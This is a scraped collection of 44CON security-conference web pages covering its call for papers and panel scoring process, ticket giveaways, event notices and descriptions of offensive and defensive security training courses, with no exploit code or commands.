          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          2 thoughts on “44CON 2018 CFP Is Open!

          Comments are closed.

          #####EOF##### Early Bird Tickets Sold Out! – 44CON

          Early Bird Tickets Sold Out!

          We opened our Early Bird Tickets last week and kept it quiet to give people a chance to get them, then when we announced them on our mailing list they went within an hour!

          If you missed your Early Bird Tickets, fear not. Our CFP is still open. If you have a great workshop or talk idea, don’t forget that accepted talks and workshops include free attendance (and in most cases cover travel and accommodation from anywhere in the world). We wrote a blog post on how to boost your chances here.

          If you’re itching to buy a ticket, regular tickets open at 8am GMT on the 10th of March, and will be available in our online shop.

          #####EOF##### Steelcon Ticket winners – 44CON

          Steelcon Ticket winners

          44CON Soldering Area at Steelcon

          Steelcon is coming up soon, Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

          We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

          And the winners are…

          After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

          We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

           

           

           

          #####EOF##### Mastering Container Security – 44CON

          Mastering Container Security

          Presented By: Rory McCune

          Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

          This course breaks down the fundamental components of Docker and Linux containers, showing how they work together to create isolated environments for applications.

          We’ll also be covering fundamental Linux security concepts such as namespaces, cgroups, capabilities and seccomp, along with showing how to secure (or break into) container-based applications.

          The course will then move on to the world of container orchestration and clustering, looking at how Kubernetes works and the security pitfalls that can leave the clusters and cloud-based environments which use containers exposed to attack.

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Guidance on how to effectively use Docker to  build secure and performant container images.
          • Details on how Linux containers are constructed and secured, including cgroups, namespaces, capability and seccomp filtering.
          • Hardening guidance for Docker Engine instances.
          • Introduction to container clustering and orchestration with Docker Swarm.
          • Secure configuration and attacks of Kubernetes clusters.
          • Techniques for effectively assessing the security of container images.

          Course Outline

          Day 1:

          • Docker Basics
          • Using Docker – This starts with basic Docker commands to familiarise students with how they work.
          • Docker networking – A look at how Docker networking operates and the options available that can be used to help isolate potentially dangerous containers.
          • Creating Docker Images – Covering how to create Docker images with examples around security tool creation.
          • Container Fundamentals – This delves into Linux container primitives, such as namespaces, cgroups, capabilities and seccomp filtering, essentially showing how container security is applied.
          • Docker Security – This looks at primary security concerns around the use of Docker Engine, including common pitfalls and how to attack or mitigate them.
          • Extras – Depending on how fast the students have been working through the day’s content, some extras can be covered, such as looking at the wider Docker ecosystem and some tooling to help manage containers more easily.

          Day 2:

          • Docker Swarm – this looks at the in-built Docker container orchestration platform, Docker Swarm, how its security is implemented and common weaknesses that might be exploited by attackers to compromise it.
          • Introduction to Kubernetes – Here we’ll cover the Kubernetes container orchestration platform and look at how it’s architected and composed. The goal is to familiarise students with how the platform operates so they can understand key areas of security concern/points of attack.
          • Kubernetes Security – This module looks at three major threat models for Kubernetes clusters (external attackers, compromised containers, and malicious users) and walks through the likely attack paths that each would take, showing practical approaches to exploiting Kubernetes security weaknesses.
          • Openshift and Amazon ECS – A quick look at some of the other commonly encountered options for containerization and possible security concerns in each of these.

          Target Audience

          Security employees, from both blue teams (internal defence) and red teams (external testers) who are looking to get a better understanding of containerisation and its security concerns.

          Student Requirements

          The course assumes a reasonable level of familiarity with Linux basics, but no familiarity with containerisation.

          What to Bring

          • Working laptop where you have administrator rights

          Software Requirements

          • Linux / Windows / Mac OS X desktop operating systems
          • SSH client capable of using key based logins

          Students will be provided with

          Copies of the course including all exercises and Virtual Machine images used during the course.

          About the Trainer

          LEAD INSTRUCTOR – Rory McCune @raesene

          Rory has worked in the Information and IT Security arena for the last 18 years in a variety of roles, from financial services, to running a small testing company, to working for large companies as a consultant. These days he spends most of his work time on application, cloud and container security.

          He’s an active member of the UK InfoSec community and has been presenting at security and general IT conferences for the last 8 years, including having the accolade of, currently, being the only person to have spoken at all the UK BSides conferences. When he’s not working he can generally be found out and about enjoying the scenery in the Highlands of Scotland, if the midgies aren’t biting!

          Book your 44CON 2019 training course now!

          #####EOF##### 44CON 2018 – 44CON

          44CON 2018

          44CON 2018 will take place from the 12th to the 14th of September 2018 at the ILEC Conference Centre. It will kick off on Wednesday 12th September at 6:30pm with our Community Evening. Entry to the Community Evening is free but you will have to register beforehand. Registration will open at 6pm.

           

          #####EOF##### How to game the 44CON CFP – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          A gypsy fortune teller brings her crystal ball to life to read the future.
          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you're not sure what's happening, contact us and we'll give you an update.
          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.
          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          2 thoughts on “How to game the 44CON CFP

          Comments are closed.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Creează un cont nou
          #####EOF##### 44CON 2014 Training – 44CON

          44CON 2014 Training

          All training courses are run on the 9th & 10th September 2014 at the Millennium Gloucester Conference Centre in Kensington, London.

          The Web Application Hacker’s Handbook, 2nd Edition: LIVE!

          MDSec (Marcus Pinto)

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days


          The Advanced Exploit Laboratory

          Saumil Shah

          The Advanced Exploit Laboratory is an all new intermediate to advanced level class, for those curious to dig deeper into the art and craft of software exploitation. We begin with a quick overview of stack overflows, exception handler abuse, memory overwrites, and other core concepts. The class then moves on to use-after-free bugs and vtable overwrites, especially applicable to browser and PDF exploits. The class also spends a lot of time focusing on defeating modern day exploit mitigation techniques like DEP and ASLR using Return Oriented Programming (ROP).

          To add extra punch, we are introducing an all new section practical exploitation of browsers on the Android platform and working with ARM exploits. This is one class you don’t want to miss!

          The Exploit Laboratory requires a lot of hands on work. Lab examples used in this class cover Linux, Windows and Android platforms, featuring popular third party applications and products instead of simulated lab exercises.

          As with the popular Exploit Laboratory, all topics are delivered in a down-to-earth, learn-by-example methodology. The same trainers who brought you The Exploit Laboratory for over eight years have been working hard in putting together advanced material based on past feedback.

          Course Length: 2 days

          This is the 100% genuine Exploit Lab! No imitations, no rip-offs


          Mobile App Security Boot Camp

          Dominic Chell & Robert Miller

          The Mobile App Security Boot Camp is an all-new novice to advanced level class covering both Android and iOS App security. As a new course for 2014, we provide the most comprehensive and cutting edge guide to mobile App security that is currently available, including in depth coverage of iOS 7!

          The class provides attendees with details on platform security protections, teaches them how to build a test environment and deep dives in to exploitation of mobile application vulnerabilities.

          This 2-day class is provided as a partnership between MDSec and MWR InfoSecurity, pioneers in mobile security.

          Course Length: 2 days


          Hacking PDF

          Didier Stevens

          PDF exploits and malicious PDF documents have been on the radar for several years now. But do you know how to detect them? And how they are constructed?

          This training will teach you how to analyze PDF files and create your own PDF hacks. PDF files that execute code, but also PDF documents to embed, obfuscate and hide all types of content. Didier Stevens will teach you how to use his Python tools to analyze PDF documents and to create your own PDF documents from scratch. With a bit of knowledge of the Python programming language, Didier Stevens will teach you how to use his PDF Python module to create all sorts of “interesting” PDF files. And for good measure, we also throw in a bit of shellcode programming. Didier Stevens will reveal you shellcode he specially designed for PDF files. This shellcode has never been released publicly.

          This is not a training on exploit development, but we will see with several exercises how exploits need to be packaged in PDF files. We focus on the PDF language, not on reversing PDF readers.

          Course Length: 2 days


          Network Analysis with the Bro Platform

          Liam Randall

          The Bro Platform is the National Science Foundation funded next generation network analysis system with use cases in security, network monitoring, DLP and more. The Bro Platform provides security teams with logs of highly structured data about their networks, a Turing complete scripting language through which they can interact with real-time stateful network events, and flexible open interfaces through which Bro can be programmed. Pragmatically able to interface with the entire network stack, Bro includes support for most common TCP/IP protocols, IPv6, tunneled traffic, SSL, and more.

          Course Length: 2 days

           

          #####EOF##### marizelfourie – 44CON

          Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

          Lab Materials for Advanced Wireless Attacks Workshop
          For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
          • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
          • A step-by-step lab setup guide
          • A detailed course guide to supplement the material covered in the workshop
          Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
          If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

          TNMOC Guided Tour Giveaway

          Proudly sponsored by F-secure

          Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

          F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

          logo_f-Secure_Red-web

          The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of smart phone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

          After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

          How to enter:

          1. Sign up to our newsletter
          2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
          3. Keep an eye on your emails in mid August to see if you’re a winner

          Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

          Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

           

          Steelcon Ticket winners

          44CON Soldering Area at Steelcon

          Steelcon is coming up soon, Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

          We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

          And the winners are…

          After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

          We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

           

           

           

          SteelCon2018 Tickets up for Grabs!

          Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

          Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

          How to enter:

          For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

          1. Purchase a 44CON 2018 ticket
          2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

          Obligatory fine print:

          Don’t stress love, if you’ve already bought a  ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
          Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
          Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

          We’d love to see you at SteelCon!

          If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at theRoyal College of Physicians in London. Tickets are available now – www.crestandiisp.com. 

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at theRoyal College of Physicians in London. Tickets are available now – www.crestandiisp.com. 

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          #####EOF##### 44CON Training – 44CON

          44CON Training

          As well as around the main event, 44CON run training throughout the year on a quarterly schedule. This page will be updated as more courses are finalised. You can also follow our twitter account 44CON or sign up to our mailing list for announcements as they come out.

          Course attendance includes invitation to an event held during or next to the training dates. Sometimes this is a whole day. Sometimes an evening event.

          2019 Schedule

          June Training: 6th – 7th June 2019

          We have 3 training courses available in June at two days in length. Training will take place at the Novotel London West in Hammersmith:

          Course attendees will be invited to an evening event, currently scheduled for the 6th of June.

          September Training: 9th – 11th September 2019

          Our call for training at 44CON 2019 has now closed. 2-Day courses will run on the 10th and 11th of September. 3-day courses will run 9th-11th September. Courses will be added to the list below as info comes in. Tickets will go on sale from April 1st.

          Training will take place at the Novotel London West in Hammersmith:

          More courses will be listed closer to the event. All course attendees are invited to a special pre-44CON evening event on the 10th of September.

          December Training: 2nd – 6th December 2019

          Our call for training is now closed. Courses will be listed in due course.

          Please contact us if you’d like to deliver training in London in March 2020.

          44CON have been running pre-conference training courses since we started in 2011. All training updates will be announced on our twitter page @44CON or you can sign up to our mailing list.

          #####EOF##### Speakers – 44CON

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          #####EOF##### Bug Hunting Millionaire: Mastering Web Attacks with Full-Stack Exploitation – 44CON

          Bug Hunting Millionaire: Mastering Web Attacks with Full-Stack Exploitation

          Presented By: Dawid Czagan

          HackerOne bug hunters have earned $20 million in bug bounties until 2017 and they are expected to earn $100 million by the end of 2020. Some of HackerOne customers include the United States Department of Defense, General Motors, Uber, Twitter, and Yahoo. It clearly shows where the challenges and opportunities are for you in the upcoming years. What you need is a solid technical training by one of the Top 10 HackerOne bug hunters.

          Modern web applications are complex and it’s all about full-stack nowadays. That’s why you need to dive into full-stack exploitation if you want to master web attacks and maximize your payouts. Say ‘No’ to classical web application hacking. Join this unique hands-on training and become a full‑stack exploitation master.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,500 (inc VAT). Book your place in our shop now.

          Learning Objectives

          After completing this training, you will have learned about:

          • REST API hacking
          • AngularJS-based application hacking
          • DOM-based exploitation
          • Bypassing Content Security Policy
          • Server-side request forgery
          • Browser-dependent exploitation
          • DB truncation attack
          • NoSQL injection
          • Type confusion vulnerability
          • Exploiting race conditions
          • Path-relative stylesheet import vulnerability
          • Reflected file download vulnerability
          • Subdomain takeover
          • And more…

          This hands-on training has been very well-received by students around the world. See what students are saying here.

          Target Audience

          Penetration testers, bug hunters, security researchers/consultants

          Student Requirements

          To get the most of this training intermediate knowledge of web application security is needed. Students should be familiar with common web application vulnerabilities and have experience in using a proxy, such as Burp Suite Proxy, or similar, to analyze or modify the traffic.

          What to Bring

          Students will need a laptop with 64-bit operating system, at least 4 GB RAM (8 GB preferred), 35 GB free hard drive space, USB port (2.0 or 3.0), wireless network adapter, administrative access, and ability to turn off AV/firewall.

          Software Requirements

          VMware Player/Fusion installed (64-bit version). Prior to the training, make sure there are no problems with running 64-bit VMs (BIOS settings changes may be needed). Please also make sure that you have Internet Explorer 11 installed on your machine or bring an up-and-running VM with Internet Explorer 11 (you can get it here).

          Students Will Be Provided With

          Students will be handed in a VMware image with a specially prepared testing environment to play with the bugs. What’s more, this environment is self-contained and when the training is over, students can take it home (after signing a non-disclosure agreement) to hack again at their own pace.

          Special Bonus

          The ticket price includes FREE access to Dawid Czagan’s 6 online courses:

          • Start Hacking and Making Money Today at HackerOne
          • Keep Hacking and Making Money at HackerOne
          • Case Studies of Award-Winning XSS Attacks: Part 1
          • Case Studies of Award-Winning XSS Attacks: Part 2
          • DOUBLE Your Web Hacking Rewards with Fuzzing (in preparation; to be published soon)
          • How Web Hackers Make BIG MONEY: Remote Code Execution (in preparation; to be published soon)

          About the Trainer

          Dawid Czagan (@dawidczagan) is an internationally recognized security researcher, trainer, and author of online security courses. He is listed among Top 10 Hackers (HackerOne). Dawid Czagan has found security vulnerabilities in Google, Yahoo, Mozilla, Microsoft, Twitter and other companies. Due to the severity of many bugs, he received numerous awards for his findings.

          Dawid Czagan shares his security bug hunting experience in his hands-on trainings “Hacking Web Applications – Case Studies of Award-Winning Bugs in Google, Yahoo, Mozilla and More” and “Bug Hunting Millionaire: Mastering Web Attacks with Full-Stack Exploitation”. He delivered security training courses at key industry conferences such as Hack In The Box (Amsterdam), CanSecWest (Vancouver), 44CON (London), Hack In Paris (Paris), DeepSec (Vienna), HITB GSEC (Singapore), BruCON (Ghent) and for many corporate clients. His students include security specialists from Oracle, Adobe, ESET, ING, Red Hat, Trend Micro, Philips and government sector (recommendations: https://silesiasecuritylab.com/services/training/#opinions).

          Dawid Czagan is a founder and CEO at Silesia Security Lab – a company which delivers specialized security testing and training services. He is also an author of online security courses. To find out about the latest in Dawid Czagan’s work, you are invited to subscribe to his newsletter and follow him on Twitter (@dawidczagan).

          Book your 44CON June 2019 training course now!

          #####EOF#####